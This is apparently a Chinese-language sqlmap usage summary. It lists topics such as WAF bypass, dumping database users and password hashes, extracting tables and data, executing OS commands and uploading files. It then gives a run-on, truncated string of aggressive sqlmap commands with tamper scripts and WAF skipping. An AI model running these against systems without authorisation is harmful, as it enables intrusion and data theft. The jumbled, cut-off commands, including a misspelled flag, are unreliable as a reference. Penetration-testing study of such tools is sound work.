sqlmap 注入方式、使用总结(常)

目录

Sqlmap

Sqlmap的简单用法

探测指定URL是否存在WAF,并且绕过

探测指定URL是否存在SQL注入漏洞

查看数据库的所有用户

查看数据库所有用户名的密码 

查看数据库当前用户 

判断当前用户是否有管理权限

列出数据库管理员角色

查看所有的数据库

查看当前的数据库

爆出指定数据库中的所有的表 

爆出指定数据库指定表中的所有的列

爆出指定数据库指定表指定列下的数据

爆出该网站数据库中的所有数据

Sqlmap的高级用法

指定脚本进行过滤

探测等级和危险等级

伪造 Http Referer头部

执行指定的SQL语句

执行操作系统命令

从数据库中读取文件

上传文件到数据库服务器中

Sqlmap的更多用法


sqlmap -r /Users/yvan/.gather/api2.1233.art.1211-163532.req -p code --level=5 --risk=3 --batch sqlmap -r request.txt -p srg --dbms=mysql --current-db --risk=3 --level=5 --fandom-agent --tamper=bluecoat --technique=bt --time-sec=10 --skip-waf sqlmap -r request.txt --level=5 --risk=3 --batch sqlmap -r request.txt --level=5 --risk=3 --batch -p name sqlmap -r request.txt --level=5 --risk=3 --batch --force-ssl --skip-urlencode sqlmap -r request.txt --dbms=mysql --current-db --risk=3 --level=5 --random-agent --tamper=bluecoat --technique=BT --time-sec=10 --skip-waf -p projectId sqlmap -r request.txt --dbms=mysql --current-db --risk=3 --level=5 --random-agent --tamper=bluecoat --proxy http://127.0.0.1:8080 --technique=BT --time-sec=10 --skip-